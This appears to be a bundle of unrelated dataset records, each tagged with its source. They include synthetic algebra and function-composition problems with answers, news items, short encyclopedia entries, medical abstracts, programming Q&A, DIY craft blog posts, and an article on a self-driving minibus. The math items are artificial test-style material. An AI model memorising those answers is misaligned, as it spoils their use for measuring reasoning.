Let t(a) = -11*a + 97. Let d be t(7). Let i(p) = -d - 3*p**2 + 20. Let k(q) = 7*q. Give k(i(o)).
-21*o**2
Let w(y) = 2882*y**2. Let g(v) = -13614*v. What is g(w(m))?
-39235548*m**2
Let p(s) = -1154*s**2. Let v(q) be the third derivative of -q**4/8 + 899*q**2 - 1. Determine p(v(g)).
-10386*g**2
Let p(w) = 3*w**2. Let q(j) = -2846709*j**2 + 2*j - 7. Give q(p(c)).
-25620381*c**4 + 6*c**2 - 7
Let j(g) = 5*g**2 - 162 - 4*g**2 + 185. Let c(p) = p**2 + 12. Let b(x) = -5*c(x) + 3*j(x). Let f(d) = 3*d**2. What is b(f(h))?
-18*h**4 + 9
Let v(b) = -28*b**2 - 13*b + 403. Let f(c) = -13*c**2 - 6*c + 186. Let k(r) = 13*f(r) - 6*v(r). Let y(o) = -3424*o. Calculate y(k(u)).
3424*u**2
Let y be (-1)/(-4)*32/(10 + -2). Let p(d) = -y - 93*d - 36*d + 50*d. Let u(w) = 4*w. Determine u(p(k)).
-316*k - 4
Let k(f) be the second derivative of -f**4/3 + 3*f. Let m(r) be the third derivative of -31*r**4/24 + 528*r**2. What is k(m(j))?
-3844*j**2
Let b(l) = -273*l**2 - 2. Let o(u) = -14*u - 381. Determine o(b(h)).
3822*h**2 - 353
Let b(c) = 2*c. Let y(k) = -36*k + 20. Let q(s) = 13*s**2 - 5*s + 2. Let u be q(-1). Let i(n) = 12*n - 6. Let d(x) = u*i(x) + 6*y(x). Give b(d(z)).
48*z
Let q(m) = 730*m - 359*m + 158*m**2 - 371*m. Let d(z) = 2*z. Give q(d(n)).
632*n**2
Let k(z) = -z**2 - 24*z + 22. Let r(s) = -2*s**2 - 20*s + 16. Let b(t) = 5*k(t) - 6*r(t). Let a(n) = -3*n. What is b(a(j))?
63*j**2 + 14
Let y(o) = 922097 - o - 922097. Let d(g) = g**2 - 7*g - 21. Let x(l) = l**2 - 5*l - 14. Let q(j) = -5*d(j) + 7*x(j). Determine q(y(c)).
2*c**2 + 7
Let a(o) = -3*o**2. Let i(y) = -236*y + 152 + 170 - 3*y - 322. Give a(i(d)).
-171363*d**2
Let t(q) = 8*q**2. Let z(c) be the third derivative of 13*c**5/15 - 3196*c**2. Give z(t(r)).
3328*r**4
Let t(u) be the first derivative of -23*u + 0*u**2 - 37 + 1/2*u**3. Let z(h) be the first derivative of t(h). Let w(l) = -35*l**2. Give z(w(q)).
-105*q**2
Let j(f) = -1678 + 1678 + 210*f + 294*f**2. Let x(y) = -y**2 - y. Let p(w) = -2*j(w) - 420*x(w). Let a(t) = 2*t**2. Calculate a(p(v)).
56448*v**4
Let k(c) be the first derivative of 0*c**2 - 11/3*c**3 + 7 + 0*c. Let u(s) = 10*s. Let t(n) = -7*n. Let i(d) = -3*t(d) - 2*u(d). Give i(k(f)).
-11*f**2
Let m(r) = -2*r + 27. Let g be m(11). Let u(j) = -11*j - 5*j - g*j + 13*j. Let z(n) = -9*n**2. Give u(z(y)).
72*y**2
Let g(z) = -z. Let y(k) = 3*k. Suppose -5*m + 45 = 3*d - 918, 2*d + 203 = m. Let f(a) = -95*a. Let w(u) = m*y(u) + 6*f(u). Give g(w(i)).
-15*i
Let m(r) be the first derivative of 4*r**3/3 + 66. Let z(p) = -44*p**2 - 66*p + 66. Let a(y) = y**2 + y - 1. Let l(v) = -66*a(v) - z(v). What is m(l(j))?
1936*j**4
Let l(u) be the first derivative of 6*u**3 - u**2/2 + u + 1. Let h(t) = -t. Let j(m) = -h(m) + l(m). Let g(c) = -51*c + 157*c + 0*c - 51*c - 54*c. Give j(g(b)).
18*b**2 + 1
Let t(u) = 1386*u**2. Let z(h) = -324*h**2. Calculate z(t(l)).
-622402704*l**4
Let g(m) = -29*m + 2. Let l(k) be the third derivative of -25*k**4/6 - 9*k**2 + 668. Give l(g(y)).
2900*y - 200
Let l(i) be the third derivative of 7*i**5/20 + i**3/3 - 6*i**2. Let t(p) = -8*p. Let o(m) = -42*m. Let q(a) = -2*o(a) + 11*t(a). Determine q(l(h)).
-84*h**2 - 8
Let f(m) = 23*m**2 - 1027 + 17*m**2 + 1027. Let y(k) be the second derivative of -k**4/6 + k. Determine f(y(p)).
160*p**4
Suppose -7*q = -3*q. Let z(y) = q*y + 6*y - 2*y. Let a(w) = -6 - 23*w - 2 + 25*w + 8. Calculate z(a(s)).
8*s
Let m = 123 + -121. Let f(j) = 457*j - m + 2 - 502*j. Let h(g) = -4*g**2. Determine f(h(k)).
180*k**2
Let z(w) = -86*w**2. Suppose 11*s - 1037 - 11855 = 0. Let b(n) = -588*n - 585*n + s*n. Determine b(z(t)).
86*t**2
Let h(z) = 35*z
|
{
"pile_set_name": "DM Mathematics"
}
|
KALAMAZOO, MI — The recent death of U.S. Army Spc. Bradley Walsh, a Kalamazoo native, prompted Gov. Gretchen Whitmer to order U.S. and Michigan flags be lowered to half-staff Thursday in honor of Walsh’s service.
The 21-year-old soldier was in his third year of active duty when he passed away on Jan. 8, according to a news release from the governor’s office. He was stationed with the 73rd Transportation Company, 10th Transportation Battalion, 7th Transportation Brigade at Joint Base Langley-Eustis in Virginia, the release said.
“Our state mourns the loss of Army Specialist Bradley Walsh as he is laid to rest,” Whitmer said in the release. “We are grateful for his selfless service to our state and nation in the United States Army. My thoughts are with his family and friends during this difficult time.”
To recognize Walsh’s “duty, honor and selfless service”, Michigan residents, businesses, schools and local governments are encouraged to bring their own flags to half-staff on Jan. 23 to coincide with Walsh’s funeral, according to the news release. Flags should be hoisted first to the peak for an instant and then lowered to the half-staff position. The process is reversed before the flag is lowered for the day, the release said.
Walsh was born in Kalamazoo, but grew up in the small Northern Michigan town of Hillman, where he enjoyed playing guitar and being outside, according to his obituary from Adams Funeral Home. He moved south again for his senior year, graduating from Otsego Adult Education in 2017 and later joining the U.S. Army.
He was described in his obituary as a kind and supportive man who would put his friends and family first.
Visitation is set for 5-8 p.m. Wednesday, Jan. 22, at Adams Funeral Home, 502 W. Michigan Ave. in Paw Paw.
Walsh’s funeral will be held at 11 a.m. Thursday, Jan. 23, at First Baptist Church, 32464 E. Red Arrow in Paw Paw. Walsh will be laid to rest at Harwick Cemetery in Mattawan.
Also on MLive:
Man ensures military honors for fellow veteran after finding remains under stairway
102-year-old WWI services papers from California traced back to Kalamazoo nurse
|
{
"pile_set_name": "OpenWebText2"
}
|
Hokkien opera
Hokkien opera may refer to several different Chinese opera genres in the Hokkien or Southern Min topolect, which are mainly performed in southern Fujian province, as well as Taiwan (including Kinmen and Penghu) and Southeast Asia (Singapore, Malaysia, Indonesia, and Philippines):
Taiwanese opera (歌仔戲), usually known as Xiang opera (薌劇) in Singapore (and for a time in Fujian as well)
Gaojia opera (高甲戲)
Liyuan opera (梨園戲)
Glove puppetry, very popular with Hokkien speakers
See also
Min opera (閩劇), an opera genre in the Eastern Min topolect, from northeastern coastal Fujian
Puxian opera (莆仙戲), an opera genre in the Pu-Xian Min topolect, from central coastal Fujian
|
{
"pile_set_name": "Wikipedia (en)"
}
|
1969 World Table Tennis Championships
The 1969 World Table Tennis Championships were held in Munich from April 17 to April 27, 1969. It was the 30th edition to be contested.
During the Cultural Revolution, Chinese sports professionals were denounced as 'Sprouts of Revisionism and were denied places at the 1967 World Table Tennis Championships and 1969 World Table Tennis Championships. Players such as Jung Kuo-tuan were persecuted and he committed suicide in 1968. Had China competed in both championships and not lost the impetus gained in the previous decade they would surely have dominated the World Championships.
Medalists
Team
Individual
References
External links
ITTF Museum
Category:World Table Tennis Championships
World Table Tennis Championships
World Table Tennis Championships
Category:Table tennis competitions in Germany
Category:International sports competitions hosted by West Germany
Category:1960s in Munich
Category:April 1969 sports events in Europe
Category:Sports competitions in Munich
|
{
"pile_set_name": "Wikipedia (en)"
}
|
{
"pile_set_name": "PubMed Central"
}
|
|
It is unlikely the founders ever imagined their simple instruction that the President should, “from time to time give to Congress information of the State of the Union,” would become the annual media-saturated public ritual it is today. For more than 100 years, from 1801 to 1913, the task was accomplished by a memo from the White House to the Capitol.
After Woodrow Wilson decided to shake things up by speaking directly to Congress about how things were going, it came to be known as “the President’s Annual Message to Congress,” and was hardly noted by anyone who didn’t make their living in politics or the press.
Franklin D. Roosevelt, who had a knack for getting attention, first began to refer to it as “the State of the Union” in 1934. By 1941, it was a means to tell Americans what was at stake in the great world war that loomed on the horizon. Nearly every January since, the sitting president strives to articulate much the same message.
In the era of electronic media, the mid-winter address has became a kind of political theater, enacted live on TV and the Internet, filled with pomp, circumstance and clever turns of phrase. Each one seeks to persuade and cajole, affirm shared values and irrefutable truths. And in doing so, each one ends up sounding an awful lot like the ones that came before.
|
{
"pile_set_name": "Pile-CC"
}
|
Zhang J, Gao X, Han Y, *et al*. Treatment effects of systematic two-stent and provisional stenting techniques in patients with complex coronary bifurcation lesions: rationale and design of a prospective, randomised and multicentre DEFINITION II trial. *BMJ Open* 2018;8:e020019. doi: 10.1136/bmjopen-2017-020019.
The sample size estimation in Statistical Analysis Part should be:
From previous studies, we hypothesized that the rate of a 1-year TLF would be 7% in the systematic two-stent technique group and 14% in the provisional stenting group. Accordingly, a total sample size of 600 is needed to detect a power of 0.8 (Type Ⅱ error = 0.2, = 0.05, 2-tailed). Because of the considerable uncertainty, the enrolment is extended to 660 patients (10% increment).
Instead of:
From previous studies, we hypothesized that the rate of a 1-year TLF would be 15% in the systematic two-stent technique group and 25% in the provisional stenting group. Accordingly, a total sample size of 600 is needed to detect a power of 0.8 (Type Ⅱ error = 0.2, = 0.05, 2-tailed). Because of the considerable uncertainty, the enrolment is extended to 660 patients (10% increment).
|
{
"pile_set_name": "PubMed Central"
}
|
Q:
C# Add variable value to list name
Is it possible to add a variable to a list name when using it?
Something like this:
string id = "1"; //Could be 2
List<string> List1 = new List<string> {"1","11" };
List<string> List2 = new List<string> {"2","22" };
foreach (var element in List+id)
{ //code here }
IDs could be a dozen different values, so I didn't even try with regular if(). Would that be the only way?
A:
Use a dictionary:
var dict = new Dictionary<string, List<string>>();
dict.Add("1", new List<string> {"1","11" });
dict.Add("2", new List<string> {"2","22" });
Then you can do
foreach (var element in dict[id])
{
}
|
{
"pile_set_name": "StackExchange"
}
|
The ending of menstruation: perspectives and experiences of lesbian and heterosexual women.
This article aims to theorize how a sample of menopausal women, lesbian and heterosexual, construct the ending of their periods, and what the experience means for them. Findings indicate that for most of the lesbian participants (who were in a sizeable minority), emotions of loss at the ending of periods were simultaneously expressed alongside positive feelings, and they engaged in greater introspection around the issue than did heterosexual women. However, lesbians did not all take up a singular subject position in relation to menstruation, indicating that there is fragmentation and plurality in how the body is experienced across a group.
|
{
"pile_set_name": "PubMed Abstracts"
}
|
Q:
How to sort on hh:mm:ss (duration) in Excel
I have a column of data that represents duration, e.g. 33:15 - 30 minutes and 15 seconds; 1:05:00 - 1 hour and 5 minutes, etc.
If I try to sort it A-Z, then 1 hour gets sorted before 30 minutes.
Is there a way to format the data to make it sort correctly? Formatting solution is preferred to converting this data into seconds or whatnot.
A:
Welcome to the wonderful world of times in Excel. Puzzling at first, but powerful once you know how they work.
I don't think there's a way to do it with just formatting in your situation. However, this should work (I'm assuming all your times are in Column A)
-Create this formula in B1 and copy it all the way down:
=IF(A1>=1,A1/60,A1)
-Format Column B as h:mm:ss
-Select Column B and Copy, then Paste Special, Values.
-Sorting Column B should now work fine.
That's the short answer. If you want to understand what's going on and how that formula was derived, read on:
1.
-Start a new sheet.
-In A1, type 1:05:00
-Click on A1, then Format, Cells. Note it has applied a custom format of h:mm:ss
Excel is pretty clever and that number is fairly unambiguous so it assumes you meant hours:minutes:seconds and formats accordingly.
2.
-In A2, type 33:15
-Note how it automagically changed it to 33:15:00
-Click on A2, then Format, Cells. Note a custom format of [h]:mm:ss
This is ambiguous. Did you mean "33 minutes and 15 seconds" Or "33 hours and 15 minutes"? Excel isn't sure. Its behaviour is to assume you meant hours and minutes. The [] around the h basically mean "show more than 24 hours in the hour section".
3.
-In A3, type 0:33:15 (note the 0: before)
-Click on A3, then Format, Cells. Note a custom format of h:mm:ss
Since you've taken out the ambiguity, it once again assumes assumes you meant hours:minutes:seconds again and formats accordingly.
4.
-In A4, type 23:15
-Note how it leaves it as 23:15
-Click on A4, then Format, Cells. Note a custom format of h:mm
W..T..F? How come it formatted it differently than in #2? Because you entered a number less than 24 (i.e. hours) - still ambiguous, and it still assumes you meant hours and minutes...but it formats differently.
5.
-In A5, type 1:00:00
-Click on A5, then Format, Cells. Note a custom format of h:mm:ss
-Change the format to General and note that the underlying number is .041667 (i.e. the percentage of a day)
6.
-In A6, type 24:00:00
-Click on A6, then Format, Cells. Note a custom format of [h]:mm:ss
-Change the format to General and note that the underlying number is 1 (i.e. a full day)
Almost there...
7.
-Now click on B2 and enter this formula:
=A2/60 (i.e. convert from hours to minutes)
-Click on B2, then Format, Cells. Note a custom format of [h]:mm:ss
-Note that it now shows 0:33:15, which is what you want
8.
-Now click on B1 and enter the same formula:
=A1/60 (i.e. convert from hours to minutes)
-Click on B1, then Format, Cells. Note a custom format of h:mm:ss
-Note that it shows 0:01:05 - damn - that's *not* what you want.
Stay on target...
9.
-Click on B1 again and enter this formula instead:
=IF(A1>=1,A1/60,A1)
-Click on B1, then Format, Cells. Enter a custom format of h:mm:ss
-Note that it still shows 1:05:00 (i.e. it didn't change it to 0:01:05)
So basically that formula:
-Checks to see if the number in a cell is greater than or equal to 1
-If it is greater than 1, divide by 60 (i.e. convert hours to minutes)
-If it's less than 1, leave it alone.
A:
If your values are interpreted by Excel as actual times, then they are sorted numerically, not alphabetically. But there are problems.
If you enter minutes and seconds as 30:00, Excel is going to interpret is as 30 hours and 0 minutes. You have to enter 30 minutes as 0:30:00 or 0:30. So 30 minutes entered like this will be interpreted as larger than one hour thirty minutes entered as 1:30. You should always check the formula bar after entering numbers to make sure Excel recorded the value you intended to enter.
CompWiz missed this intricacy, and Craig's routines just correct for your specific problems. But knowing you have to enter times as h:mm:ss even if the value is less than an hour will mean your values will always be interpreted correctly.
|
{
"pile_set_name": "StackExchange"
}
|
Adiposity and gingival crevicular fluid tumour necrosis factor-alpha levels in children.
To investigate whether adiposity is associated with gingival crevicular fluid (GCF) tumour necrosis factor-alpha (TNF-alpha) levels in children. We also examined whether this relationship is mediated through plasma fasting insulin. This preliminary study used cross-sectional data from the baseline-visit of the Quebec Adipose and Lifestyle InvesTigation in Youth cohort, which is an ongoing longitudinal study investigating the natural history of obesity in Quebec children. Study participants (76 girls and 102 boys) include children aged 8-10 years and their families, living in the Montreal and Quebec City areas. TNF-alpha level was measured in pooled samples (N=4) for each child by enzyme-linked immunosorbant assay. Height and weight were measured. Body mass index (BMI) was calculated as weight/height(2) (kg/m(2)). Sex/age-specific BMI was categorized into normal (<85th percentile), overweight (85th-95th percentile) and obese (>or=95th percentile) defined by the 2000 US-CDC growth charts. Insulin resistance was measured using fasting plasma insulin in children. Data analysis involved descriptive and multiple linear regression analyses. Our results suggest that obesity in boys was associated with a 37% increase of GCF-TNF-alpha level. However, when accounting for insulin resistance this association was reduced and disappeared while the model's goodness of fit improved. These findings provide support for the link between adiposity in children and GCF-TNF-alpha level, which appears to be mediated by insulin resistance.
|
{
"pile_set_name": "PubMed Abstracts"
}
|
Wednesday, February 27, 2013
Pinterest, I've said it before and I'll say it again: you'll be the death of me.
On the other hand, I'm lucky enough to get to participate in the Young House Love/Bower Power Blog completely unauthorized Pinterest Challenge because of you, so maybe it's a draw?
Okay, fine. I love Pinterest. I've found it an endless source of inspiration and ideas. The only trouble I have is in distilling the content; I want to do everything. Like vertical gardening, for example. Wall pockets, hanging planters, cinder blocks, you name it, I want to make it.
I took all those inspirational images and tutorials and made this: an upcycled wall planter homage to wall gardens. It wasn't exactly free, but it was pretty inexpensive, and mostly used materials (and plants) I already had on hand.
Get an old iron planter basket (mine cost $2 at Bring). You'll need to acquire this first, as you'll use it to determine how large to cut your burlap and hardware cloth. You could also use an old bicycle wheel; one of the pins above makes a spinning planter with one. (Note: Bring marks prices with a paint pen; I've had good luck removing their prices with a Magic Eraser.)
Sew a "pillow" from old coffee sack burlap, using twine pulled from the sack to sew it up. Turn it inside out and fill with a mixture of potting mix and pine shavings (to make it more lightweight).
Stitch the pillow closed and stuff it into your planter basket.
Cut some hardware cloth to the approximate size and shape of your container's back using tin snips. I had a large piece leftover from an old playhouse we tore down awhile back; chicken wire would work well, too. Cutting it down to an approximate size first makes it easier to work with when you're ready to do more exact cuts later.
Set aside your hardware cloth for the next step.
If you'll be hanging your vertical wall planter on a surface you want to protect marginally, you should add a waterproof layer so that the dirt and water don't soak through the burlap, causing stains and rot. You can use an old piece of tarp, or one of those poly pet food bags, or (like me) a piece of an awning destroyed in a windstorm. Cut it out and place it on top of your dirt pillow.
Trim down the hardware cloth to fit, then tuck it in place over the waterproof layer and use wire and some needle nose pliers to attach it to the basket.
Turn the pod over and lay it flat to begin filling in your plants.
I trimmed some of my hens & chicks plants down, and also added a divided thyme seedling and a whole lotta moss. (We'll see what survives!)
Poke or cut holes in the burlap and thread roots or runners into the holes.
Fill in around plants with moss.
I hung mine up right away for photos, but pretty much universally, it's agreed you should water it and leave it flat for a couple of weeks to allow the plants to take root. So after taking some pictures, I took the planter down again and laid it flat to do exactly that.
Patience is a virtue.
Thanks for reading, and thanks to Sherry and Katie for issuing the Pinterest Challenge! It's always good to have the chance to mark a project off my list . . . especially one that first caught my attention over a year ago.
Friday, February 22, 2013
We must have watched that Betty Crocker/Howdini robot cake tutorial a hundred times. You know the one; the tutorial that comes up as the top eight hits when you search for robot cake tutorial videos? This one right here. Someone's marketing intern spends a lot of time getting that thing posted EVERYWHERE.
And I was going to make it. I had decided not to go overboard on the cake this year, as last year's Zelda cake had me up till three in the morning. I'm too tired for that. So I was going to make the quick robot cake. The easy robot cake. The fast robot cake.
It was innocent, really. But birthday wishes are nearly impossible to deny. I mean, he only has so many years he'll be willing to let me make silly things for him. I'll blink my eyes one day and he'll have sprouted chin whiskers and sarcasm, and my days of making robot cakes are over.
Or at least that's how I justify this year's delusion of grandeur. Cake Boss makes it all look so do-able. I blame Cake Boss.
I hemmed and hawed on whether or not to build this, and in the end, to draw the Mister into the fray with me, I asked him to be the Wielder of the Drill. I found this tutorial on making a cake stand, then simplified it by using pre-cut wooden plaques and dowels from the craft store, plus some super-strength hot glue.
To make it, pick up an 8-inch round plaque and two 5x7-inch rectangular plaques. Drill holes to fit the 3/4-inch dowel, then glue in place with hot glue. Use a level while the glue sets, and offset the feet to offer a wider base in more directions for stability. Voila!
The video there calls for using donuts to cover the leg dowels. I tried using donuts. Here's some proof, along with the five-layer vanilla buttermilk M&M cake (we call it Pancake Cake) getting a crumb coat of maple sugar frosting.
But I didn't like the way it looked. Especially after a day in the fridge where, even wrapped, the leg donuts started to dry up and show off their seams. Yuck. I needed a plan B, and luckily, I had one in the form of a half a tray of leftover Rice Krispies treats I'd made for the head. In future photos, that's what you'll see (covered entirely in marshmallow fondant) in place of the donut legs.
It went back in the fridge after the crumb coat. Then I started rolling out the fondant . . . and then rolling it out again . . . and then rolling it out again. Four times in all, by the time I'd smoothed the fondant onto the cake without it ripping outright.
And I don't have a lot of photos of the cake in process from this point forward because of the sugar and the sticky all over my hands . . . so let's look at at some more photos of half-eaten cake while I tell you a little bit about it.
First off, the recipes.
I was looking for something nice and sturdy for the robot cake, since it was going to be several layers high. Regular box mix isn't dense enough (and doesn't taste as good as the recipe I eventually chose . . . trust me. And the family. And the guests at the party. And the Mister's co-workers.) so I went to my stand-by cookbook for tall cakes: Sky High by Alisa Huntsman, Peter Wynne, and Tina Rupp.
I chose the Vanilla Buttermilk Cake recipe. I wanted something kinda plain because I planned to add M&Ms to the batter. It tastes like the very best pancakes you've ever eaten, but more cake-y. I'm going to link you here to a VERY similar recipe at Sweetapolita, but I still recommend picking up a copy of this book. I've used at least five recipes from it, and they've all been really, really satisfying. You know what I mean. Sometimes desserts look or sound better than they taste. The recipes I've used from this book live up to your expectations.
I made two full recipes for a total of six layers (but only used five for the final cake). Instead of using the chocolate icing recipe included with this cake recipe in the book, I made maple cream cheese icing. Well, semi-made.
I mixed four tubs of store-bought cream cheese icing with food coloring and maple flavoring (to taste; I think it was two teaspoons) in my Kitchen-Aid. I recommend it. The combination was pretty darn good.
The cake doesn't develop much of a dome as it bakes, so I didn't have to do any trimming, and the amount of frosting I mixed up was just about the right amount for sticking the cake securely to the robot-legs cake stand, frosting between each layer, and crumb coating the entire stack.
Peanut butter cream cheese icing, of course, like last year, because it's so darn good. Half a cup of peanut butter to one tub of cream cheese icing.
Because I was busting these out while my kiddo and the Mister were out on the town, I didn't have anyone around to snap photos while my hands were covered in stuff you shouldn't get on a camera. And at the party I was flying around and didn't get a chance to snap as many photos as I would have liked, so the only images I have of the finished cupcakes are in shots like these, where you can almost make them out in the crepe streamers.
Rar. The green peanut butter icing had blue and green sugar crystals dusted on the rims. Some of the cupcakes spelled out my kiddo's name in silver fondant letters; others had individual fondant robot parts painted with food coloring and dusted with pearl dust, and were arranged to form whole robots. (Surely someone has a photo. I'll update this if one pops up.)
Speaking of fondant, I've worked with marshmallow fondant before, and I still can't get it right. There's some technique I'm missing, wherein the stuff doesn't rip and tear and pull apart when you're trying to drape it over a simple round cake.
So I did it four times. The second time, I was this close, and then the weight of the fondant itself pulled a tear right along the top edge. The third time, it stuck to the table. Arrgh.
I finally got it on there, but as I'd worked it unto death, there are the tiniest micro-fractures in it. Of course, because I'd spent so much time rolling everything out, by the time I finally had it good to go, the crumb coat wasn't sticky any more. I brushed a little corn syrup on the sides of the cake to help the fondant stick. It worked like a charm.
In the comments section of the marshmallow fondant recipe I used, a few people imply that this recipe isn't awesome for making decorations, but that wasn't my experience. It set up fine, just like other recipes I've used. The flat decorations stuck easily using a paintbrush + lemon juice/water to glue them in place, and the round balls on top of his antennae firmed up very well. I had just as easy a time cutting the rolled fondant with a knife as I did with cookie cutters or the pizza cutter. Other than the draping, it was very easy to work with.
In some places, like the eyes, I had several layers of fondant decorations stuck on top of one another. They stayed in place perfectly.
The head is made of the standard Treats recipe on the back of the Rice Krispies box, molded in a small, buttered Pyrex bowl. When it had set up in the refrigerator, I slipped it out, iced it (with the leftover peanut butter icing, as I'd used up all of the maple) and covered it in leftover fondant . . . which this time did NOT rip apart.
The rivets are made using the same drinking straw punch-out method I used on last year's Zelda cake, pressed on using lemon juice/water glue. There are just fewer of them, thank heavens.
I'd pressed the leftover Rice Krispies treats into a cake pan and didn't really have a plan in mind for them until the donut plan went to pieces (literally). I've never used them in an application like this before, and so it was a really happy discovery how well they worked to cover the legs.
I just cut rectangles to fit, and the treats molded easily in my hands to fit around the dowels. My only caveat is that the marshmallow fondant can look a little lumpy over the treats. I think this can be alleviated by adding an extra layer of icing before applying the fondant; lesson learned for next time.
Okay, this is getting legendarily wordy, so let me sum it up with a couple detail photos from the postmortem.
Oh man! I can't believe I finished that whole post! A doozy for sure. Thanks for sticking with it. I learn so much every time I make one of these cakes, and I hope I've anticipated some of the questions other novices might have.
If you have any other questions, ask 'em in the comments and I'll do my best to answer. Otherwise, you can make these photos a bit larger by clicking on them, and get a bit more detail that way! And a big thank you to my sister-in-law M and the Mister for thinking to capture a few photos to add to my few. You guys rock!
Wednesday, February 20, 2013
I've been promising to get this tutorial up sooner rather than later because someone specially requested it. This is a fun project, plus a good way to upcycle some thrift store stuff or things you might already have.
Materials:
1) Tall Glass Vase (wide and a little curvy is good). Mine cost $4 with a 20% off coupon at the Village and is 15 inches tall. These can be really expensive new, so it pays to do some thrift store hunting and some garage sale-ing if you have the time.
2) Stainless steel pan lid (one with a screw-on handle and a steam vent) that kinda fits the vase top. Mine was $1 at Goodwill.
3) Lamp kit. I pulled mine out of a thrift store lamp. The lamp cost $3. A new lamp kit from the hardware store cost $12. Plus mine wasn't brass. Just make sure the thrifted lamp is modern and UL listed so you won't have to worry about fire risk.
4) Lamp harp. If your thrifted lamp didn't come with one, you'll need it to hold the lampshade on your new lamp. I found a bin full of these for $1 apiece at Bring. They're way more expensive new.
5) Drum shade. I bought this one for $2.99 at Goodwill. The shape was right, the fabric was horrible. I wasn't sure I'd make it work, but you'll see how I turned it all around. (This will work best if your shade has sides that are straight, and the diameter is the same at the top as at the bottom.)
Let's do the shade first, because it's the hardest. If your shade is white or neutral colored, you can skip the tedious step of removing the fabric from the shade. If not, use an X-acto blade to carefully slit the fabric (but not the plastic shade).
Carefully puuuuuuuuullllll the fabric off the shade. It will probably be glued down well. It will probably come off in strips. It will probably take really strong fingers and a couple of hours to get it all off. Unfortunately, with colors this bright, covering over the top was not an option. Fortunately, most lampshades don't look like this one did.
Once your shade is blank, set it aside while you cut open and iron your coffee sack on a high steam setting. Get it as flat and smooth as possible. Line up your shade on one end and cut while rolling. Leave a seam allowance of an inch, top, bottom, and end. Once you have your piece cut to the right length, press flat a hem at each short end.
Hot glue one end to the shade, leaving the hem loose for now. Use as much glue as necessary to get the burlap to stick, without seeping through.
Once the glue has cooled, pull and smooth the burlap to test for fit. Attach the burlap to the shade as you roll it, adding glue as needed (especially at the top and bottom edge). When you get all the way around, glue down the starting hem, and glue the finishing hem over the top of it.
Wrap the top and bottom edge of the burlap over the top and bottom edge of the shade and glue to the inside. Where the support brace meets the shade, cut slits on the edge of the burlap for a proper fit.
Done! Yes, this is the hard part. If you've covered shades before or if you'll be using a readymade shade, it won't be that difficult at all.
Lamp
Don't settle for a nine-inch tall vase. Hold out for something the size of a nice, large lamp. Hit a few thrift stores, and you'll find one eventually; they get donated all the time. Once you have one, wash it inside and out. When clean, spray the inside with warm water, then a light layer of the mirror paint. Very light. This paint doesn't have much opacity to it, so you'll still be able to see through it to a degree even after several light layers.
Between layers, you can spray more water if you want a more aged finish. I wanted an extremely imperfect finish, so I was careless with the amount of water and how it pooled when I lay the vase horizontally. I wanted lots of age to it, and things don't age evenly.
Check from the outside to make sure your vase has a mirrored finish. There should be an unevenness to it where the water gathered and ran under the paint.
When everything is dried and cured, take a damp, folded paper towel and add some black acrylic to it. Lightly wipe and dab the inside of the vase with the paint. Some of the mirror paint will come off as you do this; you can control how much. More will be removed when wiping, less when dabbing. The black paint will help the imperfections in the mirror paint to be more visible from the outside.
If you make mistakes and remove too much mirror paint, let the acrylic dry and then spray another layer of the mirror.
When you get it just right, set aside the vase and let it dry and cure.
In the meantime, take your pan lid and use a screwdriver to remove the handle. Use a drill with the appropriate size of drill bit for your lamp kit to enlarge the screw hole.
Wash the lid well, then assemble your lamp kit through it. You can use THIS tutorial from Aparment Therapy. Just make sure that the cord + plug runs from the top of the pan lid, down through the steam vent, then up through the screw hole as photographed. This way, drilling through the glass isn't necessary; the cord runs out the steam vent and down the back of the lamp.
You can use small adhesive clips to adhere it to the outside of the glass, but it's not necessary. As you can see in this next photo, the cord is pretty unnoticeable.
Once everything is wired safely and tightly and you've tested with a bulb to make sure it works, use a thin line of hot glue or putty to attach the wired lid to the vase. Use a lamp harp to attach the shade to your lamp. Then plug it in!
If you get stumped, leave me a comment below and I'll help you along!
Thanks for reading!
p.s. you can make these photos larger by clicking on them, but you probably already knew that, clever you!
Linking up to
Search This Blog
The How and Why Wonder Book of Stars
The stuff I do and the way I do it, and any tools I use, suggestions I make, and tutorials on the Night Garden Design Blog are not without their risks. Sewing machine needles can puncture fingers, spray paint used without goggles can cause eye damage, yada yada yada. I poked myself in the eye with a stick the other day while weeding the yard. Everything carries risks. I recommend and encourage additional research and advise that all product manufacturer labels be followed as close to the letter as possible. Night Garden Design and I can't be held responsible for your personal safety or your project results; so take good care of yourselves, crafters!
|
{
"pile_set_name": "Pile-CC"
}
|
On August 21st, one of the important projects of Smart China Expo, “Chongqing Lijia Wisdom Experience Park” officially opened, and the auto-driving shuttle bus “Apolong II”, which undertakes the tasks of tourists and pick-ups, was also put into operation. The three ” Apolong II ” that were “on the job” in Chongqing are the version “2.0” after the upgrade.
Baidu Apolong Self-driving Minibus
Compared with the first version, the 2nd-gen Apolong is equipped with HW3.1 autopilot system, with high-performance intel E5, 8-core processor and other upgrade configurations, with more computing capability, making the brain more efficient in the face of a variety of different applications and workloads. In addition, the higher performance regulator template allows the power supply to maintain a stable battery life even in harsh environments such as cold and humidity.
In terms of battery life, Apolong II is equipped with CATL power battery, battery capacity is increased from 42.3kwh to 49.3kwh, charging time is reduced by 50%, and cruising range is increased by 20%, which further brings a more convenient and long-lasting ride experience.
Following the launch of Apolong in 2018 Baidu AI Developer Conference, the self-driving shuttle has appeared in 25 cities and regions across China, and commercialized operation in 30 scenes. As of July 31, 2019, Apolong accumulated more than 51,000 kilometers of automatic driving mileage, serving nearly 60,000 passengers. At the same time, it also maintained the performance of safety zero accident. In the one-year scale and commercialization practice, the L4 self-driving vehicle represented by Apolong is entering the daily life of ordinary people and has completed the “automatic driving experience science” again and again.
It is worth noting that in early July of this year, Baidu Apollo Enterprise Edition’s Minibus solution ushered in model upgrades and more partners. Baidu and King Long bus launched the Apolong bus, which realized the automatic driving from the closed park to the open road, as well as the light commercial van JMC Teshun shuttle bus cooperated by Baidu and JMC also carried out trial operation in JMC’s Nanchang industrial park, a series of self-driving vehicles equipped with Baidu’s Apollo Minibus solution are rapidly developing, the launch of the second-gen Apolong is also an important step in the acceleration of Baidu’s automatic driving.
About Apolong Shuttle Bus
“Apolong” is the first commercial-grade driverless micro-cycle electric vehicle produced by Baidu and King Long Automotive.
“Apolong” is 4.3 meters long and 2 meters wide. It has 8 seats, it can carry 14 passengers. It is powered by pure electric power and range of 100 kilometers (1st-gen).
On July 4, 2018, Li Yanhong announced that “Apolong”, the world’s first L4 mass production autopilot bus jointly operated by Baidu and King Long, was officially mass-produced.” On October 12, 2018, Baidu’s first unmanned commercial demonstration operation project in the China officially entered the operational phase.
|
{
"pile_set_name": "OpenWebText2"
}
|
